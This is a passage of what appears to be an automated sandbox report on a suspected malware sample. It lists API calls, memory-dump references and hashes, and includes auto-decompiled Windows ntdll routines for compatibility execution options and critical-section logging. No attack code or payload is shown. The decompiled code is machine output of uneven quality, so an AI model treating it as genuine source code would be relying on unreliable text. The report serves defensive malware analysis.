                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                                                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                            • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                                                            • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                            • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: 5jsdph8p9l_r.exe PID: 2064 Parent PID: 4024 5jsdph8p9l_r.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 00A59860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                            • Instruction ID: 01e38f4eb81fcfc3b52da05435d651a2bf1f17559722dc06c1b3839cd6de977f
                                                                                            • Opcode Fuzzy Hash: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                            • Instruction Fuzzy Hash: 4390027170100813D311616A4504707001997D03C1F91C422A0414558D9A968952F161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A59910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                            • Instruction ID: 5051a8728ddcd3ddaff522636ca02e390124de473acfd13d3dc867be3d27cc7d
                                                                                            • Opcode Fuzzy Hash: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                            • Instruction Fuzzy Hash: DD9002B170100802D340716A4404746001597D0381F51C021A5054554E8A998DD5B6A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                            • Instruction ID: 97a5fda23c1b24338368ea9b93c6915b1a90db8d41c29f0a2ca1da82ad4ff69c
                                                                                            • Opcode Fuzzy Hash: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                            • Instruction Fuzzy Hash: 279002A1702004038305716A4414616401A97E0381B51C031E1004590DC9658891B165
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                            • Instruction ID: acee84d3fe0d625309e564dda8a708dcdfa0cdb1c4c0dc461eeb2c6f632d8efd
                                                                                            • Opcode Fuzzy Hash: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                            • Instruction Fuzzy Hash: C490027170108C02D310616A840474A001597D0381F55C421A4414658D8AD58891B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A59660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9c6d0281acda6bb6bfb3b45eff6439eed52d16c1f93929b52b8d5e5341128b18
                                                                                            • Instruction ID: 415763800343310357bec0ac22a3169653c4b1ef28b9263ff1170b2231815032
                                                                                            • Opcode Fuzzy Hash: 9c6d0281acda6bb6bfb3b45eff6439eed52d16c1f93929b52b8d5e5341128b18
                                                                                            • Instruction Fuzzy Hash: 0090027170100C02D380716A440464A001597D1381F91C025A0015654DCE558A59B7E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A59FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d90012ec0874383484f30e3b2f1b1fde0c9dae8f37da40abaf4ee90da3b8eaab
                                                                                            • Instruction ID: bc0227ddc7d66caa55359caec6db9ceb3794921905d00be3326b7f05283b4343
                                                                                            • Opcode Fuzzy Hash: d90012ec0874383484f30e3b2f1b1fde0c9dae8f37da40abaf4ee90da3b8eaab
                                                                                            • Instruction Fuzzy Hash: 0390027171114802D310616A8404706001597D1381F51C421A0814558D8AD58891B162
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A5967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                            • Instruction ID: 945a714f111609a382a60f3185fa051e5cbae16d842d86037fbe94dd3358aa8b
                                                                                            • Opcode Fuzzy Hash: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                            • Instruction Fuzzy Hash: 9CB09B71D014C5D5D711D7714608717795077D0741F16C061D1020681B4778C495F5B6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00A140FD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 63%
                                                                                            			E00A140FD(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0xb0d360 ^ _t107;
				_v8 =  *0xb0d360 ^ _t107;
				_t105 = __ecx;
				if( *0xb084d4 == 0) {
					L5:
					return E00A5B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E00A2E9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					_t49 = E00A142EB(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E00A141EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E00A596C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					_t55 = E00A1429E(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v556 - _t85;
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E00AA5720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						E00A5FA60( &_v548, 0, 0x214);
						_t106 =  *0xb084d4;
						_t110 = _t108 + 0x20;
						 *0xb0b1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0xb084d4))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E00A5B75A();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E00AA5720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E00A61480( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E00AA5720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v556 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E00A61150(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E00AA5720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E00A93E13(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v556;
							} while (_t106 < _v556);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E00AA5720();
						goto L15;
					}
					L8:
					_t56 = E00A141F7(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                            0x00a1410d
                                                                                            0x00a1410f
                                                                                            0x00a1411c
                                                                                            0x00a1411e
                                                                                            0x00a14158
                                                                                            0x00a14168
                                                                                            0x00a14168
                                                                                            0x00a14126
                                                                                            0x00a14130
                                                                                            0x00a1413c
                                                                                            0x00a704a2
                                                                                            0x00a14142
                                                                                            0x00a1414b
                                                                                            0x00a1414b
                                                                                            0x00a1414f
                                                                                            0x00a1416b
                                                                                            0x00a14171
                                                                                            0x00a14176
                                                                                            0x00a14178
                                                                                            0x00a141d0
                                                                                            0x00a141d2
                                                                                            0x00a141d3
                                                                                            0x00a141a7
                                                                                            0x00a141ae
                                                                                            0x00a141b0
                                                                                            0x00a141db
                                                                                            0x00a141b2
                                                                                            0x00a141b8
                                                                                            0x00a141bf
                                                                                            0x00a141c1
                                                                                            0x00a141c1
                                                                                            0x00a141c1
                                                                                            0x00a141c3
                                                                                            0x00a141c5
                                                                                            0x00a141df
                                                                                            0x00a141e2
                                                                                            0x00a141e2
                                                                                            0x00a141c7
                                                                                            0x00a141c9
                                                                                            0x00a70628
                                                                                            0x00a70628
                                                                                            0x00a70630
                                                                                            0x00a70631
                                                                                            0x00a70633
                                                                                            0x00a70635
                                                                                            0x00a70635
                                                                                            0x00000000
                                                                                            0x00a141c9
                                                                                            0x00a1417d
                                                                                            0x00a14183
                                                                                            0x00a14189
                                                                                            0x00a1418e
                                                                                            0x00a14190
                                                                                            0x00a704a9
                                                                                            0x00a704af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a704b5
                                                                                            0x00a704c8
                                                                                            0x00a704d5
                                                                                            0x00a704e5
                                                                                            0x00a704ea
                                                                                            0x00a704f6
                                                                                            0x00a70518
                                                                                            0x00a7051e
                                                                                            0x00a70520
                                                                                            0x00a70522
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a70528
                                                                                            0x00a7052e
                                                                                            0x00a70530
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a7053b
                                                                                            0x00a7053d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a70545
                                                                                            0x00a7054c
                                                                                            0x00a7054e
                                                                                            0x00a70623
                                                                                            0x00000000
                                                                                            0x00a70623
                                                                                            0x00a70556
                                                                                            0x00a70557
                                                                                            0x00a7056f
                                                                                            0x00a70574
                                                                                            0x00a70583
                                                                                            0x00a7058a
                                                                                            0x00a7058b
                                                                                            0x00a7058d
                                                                                            0x00a705b5
                                                                                            0x00a705c0
                                                                                            0x00a705c6
                                                                                            0x00a705c8
                                                                                            0x00a705cb
                                                                                            0x00a705cd
                                                                                            0x00a705d3
                                                                                            0x00a705d5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a705db
                                                                                            0x00a705db
                                                                                            0x00a705e3
                                                                                            0x00a705e7
                                                                                            0x00a705e9
                                                                                            0x00a705eb
                                                                                            0x00a705ed
                                                                                            0x00a705ed
                                                                                            0x00a705fa
                                                                                            0x00a705ff
                                                                                            0x00a70606
                                                                                            0x00a7060b
                                                                                            0x00a7060d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a70613
                                                                                            0x00a70613
                                                                                            0x00a70616
                                                                                            0x00a70616
                                                                                            0x00000000
                                                                                            0x00a7061e
                                                                                            0x00a7058f
                                                                                            0x00a70594
                                                                                            0x00a70596
                                                                                            0x00a70598
                                                                                            0x00000000
                                                                                            0x00a7059d
                                                                                            0x00a14196
                                                                                            0x00a14198
                                                                                            0x00a1419d
                                                                                            0x00a1419f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a141a1
                                                                                            0x00000000
                                                                                            0x00a14151
                                                                                            0x00a14151
                                                                                            0x00a14151
                                                                                            0x00000000
                                                                                            0x00a14151

                                                                                            Strings
                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A704BF
                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A7058F
                                                                                            • Execute=1, xrefs: 00A7057D
                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A705F1
                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A705AC
                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A70566
                                                                                            • ExecuteOptions, xrefs: 00A7050A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                            • API String ID: 0-484625025
                                                                                            • Opcode ID: aae56e526458800f12d761e5f242466e163786cb56d2462ab68bd878d3d6cf7d
                                                                                            • Instruction ID: d7f07cc0db9ff24a1fec7a8b010f1e46759b3f20542887ebf33efe48545cd9b7
                                                                                            • Opcode Fuzzy Hash: aae56e526458800f12d761e5f242466e163786cb56d2462ab68bd878d3d6cf7d
                                                                                            • Instruction Fuzzy Hash: 62612A71A0021DBADF10DBA8DD86FFA73B9AF58304F144199E609A7181EB709EC5CF64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AAFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E00AAFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                            0x00aafdda
                                                                                            0x00aafde2
                                                                                            0x00aafde5
                                                                                            0x00aafdec
                                                                                            0x00aafdfa
                                                                                            0x00aafdff
                                                                                            0x00aafe0a
                                                                                            0x00aafe0f
                                                                                            0x00aafe17
                                                                                            0x00aafe1e
                                                                                            0x00aafe19
                                                                                            0x00aafe19
                                                                                            0x00aafe19
                                                                                            0x00aafe20
                                                                                            0x00aafe21
                                                                                            0x00aafe22
                                                                                            0x00aafe25
                                                                                            0x00aafe40

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AAFDFA
                                                                                            Strings
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AAFE2B
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AAFE01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000028.00000002.778775448.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                            • Instruction ID: 910e455111a69d8b8af75ac2cc0b27ebdce503809dccb35f03805d19378c1c70
                                                                                            • Opcode Fuzzy Hash: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                            • Instruction Fuzzy Hash: 39F0F632600601BFEA241A95DD06F37BF6AEB45730F240715F628565E1EA62F82097F4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%